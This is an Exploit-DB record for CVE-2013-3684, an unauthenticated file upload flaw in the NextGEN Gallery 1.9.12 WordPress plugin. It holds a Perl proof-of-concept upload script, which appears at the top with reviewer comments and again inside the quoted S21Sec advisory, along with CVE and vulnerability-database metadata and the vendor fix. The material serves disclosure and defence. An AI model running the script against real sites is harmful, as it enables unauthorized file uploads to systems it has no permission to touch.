source: http://www.securityfocus.com/bid/60533/info
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
#! /usr/bin/perl
# Proof-of-concept from the advisory text reproduced further down this page
# (S21SEC-046-en, CVE-2013-3684): sends a single multipart/form-data POST to
# the URL given on the command line, carrying a local file as an upload.
# The advisory attributes the issue to admin/upload.php accepting requests
# that carry no auth cookie at all; the vendor fix is NextGEN Gallery 1.9.13.
#
# Usage as written: <script> <target-url> <local-file>
#
# NOTE(review): no `use strict; use warnings;` — the undeclared `$name` below
# would otherwise be a compile error. LWP and HTTP::Request::Common are CPAN
# modules, not core Perl.
use LWP;
use HTTP::Request::Common;
# Positional arguments: target URL, then path of the local file to send.
# Neither value is validated; a missing $file makes the Filedata part fail.
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
# Build the multipart POST. HTTP::Request::Common's POST() takes
# Content_Type => 'form-data' plus an arrayref of form fields.
my $req = POST $url,
Content_Type => 'form-data',
Content => [.    # NOTE(review): the trailing `.` is a syntax error; the same PoC quoted in the advisory below reads `Content => [` — likely an extraction artifact
name => $name,   # $name is never assigned anywhere in this script, so the field is sent empty (undef) — TODO confirm what the plugin expects here
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]    # local $file is sent under the fixed name "file.gif" with a claimed image/gif type; the advisory notes the plugin filtered only on image extensions
];
# Send the request and echo the outcome: response body on 2xx, otherwise the
# HTTP status line. Nothing in the reply is parsed.
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
{"id": "EDB-ID:38585", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability", "description": "WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability. CVE-2013-3684. Webapps exploit for php platform", "published": "2013-06-12T00:00:00", "modified": "2013-06-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/38585/", "reporter": "Marcos Garcia", "references": [], "cvelist": ["CVE-2013-3684"], "lastseen": "2016-02-04T08:24:57", "viewCount": 23, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-04T08:24:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3684"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:6453"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122021"]}], "modified": "2016-02-04T08:24:57", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/38585/", "sourceData": "source: http://www.securityfocus.com/bid/60533/info\r\n\r\nThe NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.\r\n\r\nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.\r\n\r\nNextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. \r\n\r\n#! /usr/bin/perl \r\nuse LWP; \r\nuse HTTP::Request::Common; \r\n\r\nmy ($url, $file) = @ARGV; \r\n\r\nmy $ua = LWP::UserAgent->new(); \r\nmy $req = POST $url, \r\nContent_Type => 'form-data', \r\nContent => [. 
\r\nname => $name, \r\ngalleryselect => 1, # Gallery ID, should exist \r\nFiledata => [ \"$file\", \"file.gif\", Content_Type => \r\n'image/gif' ] \r\n]; \r\nmy $res = $ua->request( $req ); \r\nif( $res->is_success ) { \r\nprint $res->content; \r\n} else { \r\nprint $res->status_line, \"\\n\"; \r\n} \r\n\r\n", "osvdbidlist": ["94232"]}
{"cve": [{"lastseen": "2020-12-09T19:52:43", "description": "NextGEN Gallery plugin before 1.9.13 for WordPress: ngggallery.php file upload", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T18:15:00", "title": "CVE-2013-3684", "type": "cve", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3684"], "modified": "2020-02-13T15:12:00", "cpe": [], "id": "CVE-2013-3684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3684", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2020-06-29T19:22:43", "bulletinFamily": "software", "cvelist": ["CVE-2013-3684"], "description": "WordPress Vulnerability - NextGEN Gallery 1.9.12 - Arbitrary File Upload\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6453", "href": "https://wpvulndb.com/vulnerabilities/6453", "type": "wpvulndb", "title": "NextGEN Gallery 1.9.12 - Arbitrary File Upload", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": 
"2016-12-05T22:13:26", "description": "", "published": "2013-06-13T00:00:00", "type": "packetstorm", "title": "NextGEN Gallery 1.9.12 Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3684"], "modified": "2013-06-13T00:00:00", "id": "PACKETSTORM:122021", "href": "https://packetstormsecurity.com/files/122021/NextGEN-Gallery-1.9.12-Shell-Upload.html", "sourceData": "`############################################################## \n \n \n- S21Sec Advisory - \n \n \n############################################################## \n \nTitle: NextGEN Gallery 1.9.12 Arbitrary File Upload \nID: S21SEC-046-en \nCVE ID: CVE-2013-3684 \nSeverity: High \nStatus: Fixed \nHistory: 27.May.2013 Vulnerability discovered \n28.May.2013 Vendor informed \n12.Jun.2013 Fix released \nAuthors: Marcos Ag\u00fcero (maguero@s21sec.com) \nURL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt \nRelease: Public \n \n \n[ SUMMARY ] \n \nNextGEN Gallery is a WordPress gallery plugin that offers sophisticated \ngallery management and \ndisplays. It's one of the most popular plugins ever produced for \nWordPress, currently downloaded \naround 30,000 times per week. \n \n[ AFFECTED VERSIONS ] \n \n* NextGEN Gallery 1.9.12 \n \n[ DESCRIPTION ] \n \nNextGEN Gallery allows file upload to unauthenticated users. Filters in \nplace only permits uploads \nof image files (extensions .gif, .png and .jpg). This avoids scripts \nexecution problems but an \nattacker could use the affected system to host files. \n \nVulnerability occurs due an innapropiate cookie validation in \nadmin/upload.php script: \n \nif (wp_validate_auth_cookie()) { \n$results = wp_parse_auth_cookie(); \n$logged_in = FALSE; \nif (isset($results['username']) && isset($results['expiration'])) { \nif (time() < floatval($results['expiration'])) { \nif (($userdata = \nget_userdatabylogin($results['username']))) \n$logged_in = $userdata->ID; \n} \n} \n \nif (!$logged_in) die(\"Login failure. 
-1\"); \nelse if (!user_can($logged_in, 'NextGEN Upload images')) { \ndie('You do not have permission to upload files. -2'); \n} \n} # VULN: No auth cookie is okay! \n \nThis can be triggered by invoking 'nggupload' parameter on any valid \nwordpress URL: \n \nngggallery.php: \n \n// Handle upload requests \nadd_action('init', array(&$this, 'handle_upload_request')); \n \n[...] \nfunction handle_upload_request() \n{ \nif (isset($_GET['nggupload'])) { \nrequire_once(implode(DIRECTORY_SEPARATOR, array( \nNGGALLERY_ABSPATH, \n'admin', \n'upload.php' \n))); \nthrow new E_Clean_Exit(); \n} \n} \n \n[ POC ] \n#! /usr/bin/perl \nuse LWP; \nuse HTTP::Request::Common; \n \nmy ($url, $file) = @ARGV; \n \nmy $ua = LWP::UserAgent->new(); \nmy $req = POST $url, \nContent_Type => 'form-data', \nContent => [ \nname => $name, \ngalleryselect => 1, # Gallery ID, should exist \nFiledata => [ \"$file\", \"file.gif\", Content_Type => \n'image/gif' ] \n]; \nmy $res = $ua->request( $req ); \nif( $res->is_success ) { \nprint $res->content; \n} else { \nprint $res->status_line, \"\\n\"; \n} \n \n[ SOLUTION ] \n \nVersion 1.9.13 released by vendor. \nhttp://wordpress.org/plugins/nextgen-gallery/ \n \n[ REFERENCES ] \n \n* S21Sec \nhttp://www.s21sec.com \n \n-- \nS21sec \n \n*Marcos Ag\u00fcero* \n/S21sec ACSS/ \n \nTlf: +34 902 222 521 \n \nwww.s21sec.com <http://www.s21sec.com>, blog.s21sec.com \n<http://blog.s21sec.com> securityblog.s21sec.com \n<http://securityblog.s21sec.com> \n \nSalvo que se indique lo contrario, esta informaci\u00f3n es CONFIDENCIAL y \ncontiene datos de car\u00e1cter personal que han de ser tratados conforme a \nla legislaci\u00f3n vigente en materia de protecci\u00f3n de datos. Si usted no es \ndestinatario original de este mensaje, le comunicamos que no est\u00e1 \nautorizado a revisar, reenviar, distribuir, copiar o imprimir la \ninformaci\u00f3n en \u00e9l contenida y le rogamos que proceda a borrarlo de sus \nsistemas. 
\n \nUnless contrary indicated, this information is CONFIDENTIAL and contains \npersonal data that shall be processed according to personal data \nprotection law in force. If you are not the named addressee of this \nmessage you are hereby notified that any review, dissemination, \ndistribution, copying or printing of this message is strictly prohibited \nand we urge you to delete it from your Systems. \n \nAntes de imprimir este mensaje valora si verdaderamente es necesario. De \nesta forma contribuimos a la preservaci\u00f3n del Medio Ambiente. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/122021/S21SEC-046-en.txt"}]}